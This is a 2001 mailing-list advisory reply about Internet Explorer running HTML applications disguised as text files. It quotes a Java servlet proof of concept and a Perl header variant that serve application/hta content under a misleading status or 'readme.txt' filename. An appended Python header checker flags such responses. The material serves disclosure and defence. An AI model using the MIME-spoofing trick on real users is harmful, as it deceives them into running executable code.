Re: MSIE may download and run programs automatically - NOT SO FAST

From: Georgi Guninski (guninskiat_private)
Date: Tue Dec 18 2001 - 10:09:54 PST


    jelmer wrote:
    > 
    > Here's another way to go about it (without the use of mhtml files)
    > 
    >   package nl.xs4all.kuperus.exploits;
    > 
    >   import javax.servlet.http.HttpServlet;
    >   import javax.servlet.http.HttpServletRequest;
    >   import javax.servlet.http.HttpServletResponse;
    >   import javax.servlet.ServletException;
    >   import java.io.IOException;
    >   import java.io.PrintWriter;
    > 
    >   public class SpoofIt extends HttpServlet {
    > 
    >       protected void doGet(HttpServletRequest request,
    >                            HttpServletResponse response)
    >               throws ServletException, IOException {
    > 
    >           response.setContentType("application/hta");
    >           response.setStatus(201);
    > 
    >           PrintWriter out = response.getWriter();
    >           out.write("this is a hta");
    > 
    >       }
    > 
    >       protected void doPost(HttpServletRequest request,
    >                             HttpServletResponse response)
    >               throws ServletException, IOException {
    >           // delegate to this servlet's own doGet (HttpServlet.doGet would
    >           // only answer with an error status)
    >           doGet(request, response);
    >       }
    >   }
    > 
    > Once the user clicks on open, the hta file is started according to its
    > MIME type application/hta. All the time the user is thinking it is
    > actually a .txt file.
    > 
    > On IE 5.5 this works even without the response code set to 200.
    > On IE 6 with all patches in place including the latest 'mega pack :)'
    > you have to set the content type to something other than 200 or the
    > hta extension will show.
    > 
    > A working example is available at
    > 
    > http://kuperus.xs4all.nl/microsoft.txt
    > 
    
    A modification in Perl which doesn't need playing with 200 is:
    ...
    print "Content-type: application/hta\n";
    print "Content-disposition: inline; filename=\"readme.txt\"\n";
    ...more stuff...
    This works on the so called "patched" IE 6.0.
    
    Vendor status:
    Microsoft was informed on 15.December.2001.
    2 days later they pretended they had not received the Perl attachment
    I sent to them and also cc'ed to myself (and sure, I received my attachment).
    Have not heard from them since then.
    
    Disclaimer:
    The information in this advisory is believed to be true based on
    experiments though it may be false.
    The opinions expressed in this advisory and program are my own and
    not of any company. The usual standard disclaimer applies,
    especially the fact that Georgi Guninski is not liable for any damages
    caused by direct or  indirect use of the information or functionality
    provided by this advisory or program. Georgi Guninski bears no
    responsibility for content or misuse of this advisory or program or
    any derivatives thereof.
    
    Georgi Guninski
    http://www.guninski.com
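Both posts above rely on the same trick: a response whose declared Content-Type is an executable type (application/hta) while the status code or the Content-Disposition filename makes it look like a harmless text file. The following is an added example, not code from either post or from either author, written from the defender's side: a Python check that a proxy or log reviewer could run over response headers to flag that combination. The sample responses are constructed, and the types listed in ACTIVE_TYPES other than application/hta are assumptions, not taken from the thread.

```python
"""Flag HTTP responses whose headers pass active content off as something
harmless, e.g. Content-Type application/hta with a readme.txt filename."""
import mimetypes
from email.message import Message

# Content types a browser may hand to an execution engine instead of rendering.
# Only application/hta comes from the thread; the other two are assumptions.
ACTIVE_TYPES = {
    "application/hta",
    "application/x-msdownload",
    "application/x-msdos-program",
}


def _disposition_filename(value):
    """Return the filename parameter of a Content-Disposition value, or None."""
    if not value:
        return None
    msg = Message()
    msg["Content-Disposition"] = value
    return msg.get_filename()


def check_response(status, headers):
    """Return a list of (rule, detail) findings for one response.

    status:  integer HTTP status code
    headers: dict of header name -> value; names are matched case-insensitively
    """
    h = {k.lower(): v for k, v in headers.items()}
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    filename = _disposition_filename(h.get("content-disposition"))
    findings = []

    if ctype in ACTIVE_TYPES:
        findings.append(("active-type", f"Content-Type {ctype} is executable content"))
        # The thread reports that a non-200 status hides the .hta extension.
        if status != 200:
            findings.append(("odd-status", f"executable type served with status {status}"))

    if filename:
        # Compare what the advertised filename implies with what the header declares.
        guessed, _ = mimetypes.guess_type(filename)
        if guessed and guessed != ctype:
            findings.append(("ext-mismatch",
                             f"filename {filename!r} implies {guessed}, header says {ctype}"))
    return findings


# Constructed sample responses mirroring the two posts plus a benign download.
SAMPLES = [
    ("servlet-style", 201, {"Content-Type": "application/hta"}),
    ("perl-style", 200, {"Content-Type": "application/hta",
                         "Content-Disposition": 'inline; filename="readme.txt"'}),
    ("benign", 200, {"Content-Type": "text/plain",
                     "Content-Disposition": 'attachment; filename="readme.txt"'}),
]


def scan(samples=SAMPLES):
    """Map each sample name to the list of rule ids that fired."""
    return {name: [rule for rule, _ in check_response(st, hd)]
            for name, st, hd in samples}


if __name__ == "__main__":
    for name, st, hd in SAMPLES:
        for rule, detail in check_response(st, hd):
            print(f"{name}: [{rule}] {detail}")
```

The extension check deliberately uses the filename the server advertises rather than the URL, since that is the name the user sees in the download prompt; a gateway that logs these findings gets a record of every response where the two disagree.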
    
